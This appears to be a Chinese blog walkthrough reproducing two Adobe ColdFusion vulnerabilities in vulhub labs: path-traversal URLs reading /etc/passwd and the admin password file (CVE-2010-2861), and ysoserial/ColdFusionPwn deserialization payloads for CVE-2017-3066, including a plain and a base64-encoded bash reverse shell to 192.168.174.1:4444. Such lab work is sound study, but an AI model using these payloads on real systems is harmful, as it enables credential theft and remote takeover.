vulhub漏洞复现系列之Adobe ColdFusion(cve-2010-2861文件读取漏洞、CVE-2017-3066反序列化漏洞)

最新推荐文章于 2024-05-14 23:46:30 发布
最新推荐文章于 2024-05-14 23:46:30 发布
阅读量939 收藏
点赞数
文章标签: coldfusion 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/110946530
版权

CVE-2010-2861)Adobe ColdFusion 文件读取漏洞

一、漏洞简介
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
二、漏洞影响
Adobe ColdFusion 8
Adobe ColdFusion 9
三、漏洞复现
直接访问http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,即可读取文件/etc/passwd:

在这里插入图片描述

读取后台管理员密码http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en
在这里插入图片描述

coldfusion反序列化漏洞(CVE-2017-3066)

漏洞详情:
Adobe ColdFusion是美国奥多比(Adobe)公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。
漏洞影响
Adobe ColdFusion (2016 release) Update 3及之前的版本,
ColdFusion 11 Update 11及之前的版本,
ColdFusion 10 Update 22及之前的版本。
漏洞复现:
建议使用linux生成poc,windows会出现报错。
这里是让他在tmp文件夹中创建一个名为lin的文件


java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-BETA-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/lin' poc.ser

在这里插入图片描述

生成poc.ser文件后,
在这里插入图片描述

将POC作为数据包body发送给http://your-ip:8500/flex2gateway/amf,Content-Type为application/x-amf
具体操作呢,先通过bp抓到一个get请求包
在这里插入图片描述
然后变更请求方式
在这里插入图片描述

再把在linux生成的poc文件拉到window上,再通过bp黏贴到包中(如果你是用linux做的就直接bp抓包然后按以下操作就行),
在这里插入图片描述
发送包,返回200,到靶场中查看一下
在这里插入图片描述
在这里插入图片描述

lin文件成功创建,漏洞利用成功
那就试试直接把touch命令改为bash命令试一下能不能反弹shell

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-BETA-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -i >& /dev/tcp/192.168.174.1/4444 0>&1 ' poc.ser

在这里插入图片描述

虽然返回的是200,但是没有反弹成功。

拿到http://www.jackson-t.ca/runtime-exec-payloads.html这里把bash命令加密一下
bash -i >& /dev/tcp/192.168.174.1/4444 0>&1
在这里插入图片描述

在linux中重新生成一个poc.ser,按上边步骤再来一次。

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-BETA-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 ' bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xLzQ0NDQgMD4mMSA=}|{base64,-d}|{bash,-i} ' poc.ser

在这里插入图片描述

成功反弹shell

Lin冲啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
vulhub漏洞26_HTTPD
weixin_44193247的博客
02-02 608
vulhub漏洞练习篇
漏洞-coldfusion-文件读取】vulfocus/coldfusion-cve_2010_2861
10-15 961
coldfusion-文件读取
09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
最新发布
碧海朝天素
05-14 773
如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费大礼包,带大家一起学习,给大家剖析Python兼职、就业行情前景的这些事儿。
Adobe ColdFusion 目录遍历漏洞 (CVE-2010-2861)
zzzzz1284的博客
01-04 330
CVE-2010-2861
Adobe ColdFusion文件读取漏洞CVE-2010-2861)
m0_73605862的博客
12-01 538
2.看答案就是一层一层进行路径穿越攻击,这里要注意如果登陆进去后总是会自己跳转到index.cfm,所以得用bp抓包改包。尝试利用漏洞读取目标系统中的“opt/coldfusion8/license.txt"文件。4.然后是opt那个,因为一般opt和etc在同一级目录下,结果成功了。3.之前一直出不来,今天突然出来了,我真的无语死了。1.环境搭建(网上写的密码是admin,就用admin)3.路径穿越就出来了。
Adobe ColdFusion 文件读取漏洞CVE-2010-2861),python编写POC和EXP
wangqiao258的博客
09-30 463
Adobe ColdFusion 文件读取漏洞CVE-2010-2861),python编写POC 环境搭建 使用vulhub,进入对应文件夹启动Adobe CanFusion 8.0.1版本服务器: [root@localhost ~]# cd /home/vulhub-master/coldfusion/CVE-2010-2861/ [root@localhost CVE-2010-2861]# docker-compose up -d 查看端口: [root@localhost ~]# d
coldfusion-10-11-xss:CVE-2015-0345 (APSB15-07) 的概念验证代码
05-31
ColdFusion 10.x 11.x XSS -> RCE PoC 漏洞利用 此存储库包含 CVE-2015-0345 (APSB15-07) 的 XSS 向量,允许在 ColdFusion 安装上获得远程命令执行。 此漏洞仅对 ColdFusion 10 和 11 安装有效。 具体来说,...
cf-tinymce:用于创建tinyMCE实例的ColdFusion函数-支持压缩和每页多个实例
04-29
概要ColdFusion函数用于创建tinyMCE实例-使用CFN并允许每页多个实例。 这是一个不错的基础,具有不错的默认设置。程式码范例要显示一个充满名为“ read”的查询的生物信息的RTE实例,请执行以下操作: <cfoutput>#...
Coldfusion-11-Application.cfc-Template:脚本样式 Application.cfc 模板,包含 Coldfusion 11 的所有方法
06-13
Coldfusion-11-Application.cfc-模板 包含 Coldfusion 11 的所有方法的脚本样式 Application.cfc 模板。 我对 Adob​​e 的文档和缺乏脚本风格的 Coldfusion 11 示例感到沮丧,所以我创建了这个。 如何使用 更改...
coldbox-platform:用于 ColdFusion (CFML) 的代、流畅和基于约定的 HMVC 框架
08-04
自 2005 年以来,Luis Majano 和 Ortus Solutions, Corp 的 ColdBox 平台版权所有 | 由于上帝的恩典,这个项目存在。 如果你不喜欢这个,那就不要读它... ColdBox 为您提供了ColdFusion (CFML) 开发的标准方法
ColdFusionPwn.jar
01-08
Adobe ColdFusion中存在java序列漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。 此工具可以Adobe ColdFusion漏洞利用,例如(CVE-2017-3066) 阅读建议:此资源开发以java为...
最新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
07-23
github已经不怎么好下载的,作者已经把文件上传到其他的平台,刚刚使用的时候遇到了一点问题,要将原文件名改正确了之后才能用。
Adobe ColdFusionCVE-2010-2861)文件读取漏洞
qq_44504968的博客
09-23 1237
Adobe ColdFusion文件读取漏洞CVE-2010-2861)漏洞原理实验环境漏洞环境漏洞 漏洞原理 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。 Adobe ColdFusion 8、9版本中
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
weixin_46239998的博客
01-01 666
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。Adobe ColdFusion 8、9版本中皆存在一处目录穿越漏洞。管理员密码获取到了,就可以正常玩耍了!三、输入admin初始环境。五、漏洞利用,读取管理员密码。
CVE-2010-2861漏洞(ColdFusion未授权漏洞)
G_Fu_Q的博客
04-08 823
漏洞介绍: Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。 Coldfusion 最早是由 Allaire 公司开发的一种应用服务器平台,其运行的 CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.c
vulhub漏洞六_coldfusion
weixin_44193247的博客
01-07 710
vulhub漏洞练习篇
Adoble ColdFusion序列漏洞CVE-2017-3066)
Kevin's Blog
01-18 832
文章目录一、介绍1.1 漏洞介绍1.2 影响版本二、漏洞三、防御 一、介绍 1.1 漏洞介绍   Adoble ColdFusion是一个动态Web服务器,其运行的 CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.cfm为文件名,在ColdFusion专用的应用服务器环境下运行。   低版本的Adobe ColdFusion中存在java序列漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服 务。 1.2 影响版本 Ad
Adobe ColdFusion 序列漏洞靶场CVE-2017-3066)
qq_43232893的博客
04-12 836
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 墨者学院之Adobe ColdFusion 序列漏洞靶场CVE-2017-3066)简介一、漏洞开启环境CVE-2017-3066漏洞 简介 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion中存在java序列漏洞。攻击者可利用该漏洞在受影响应用程
CVE-2010-2861(Adobe ColdFusion 文件读取漏洞
浅笑996的博客
11-27 2592
漏洞介绍 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 环境搭建 https://blog.csdn.net/qq_36374896/article...
Adobe ColdFusion 安装指南
"Adobe ColdFusion 安装指南" 本文档是Adobe ColdFusion的安装指南,适用于版本更新至2016年2月17日。ColdFusion是一种强大的Web应用开发平台,主要用于构建动态和交互式的网页应用程序。该指南详细介绍了安装过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值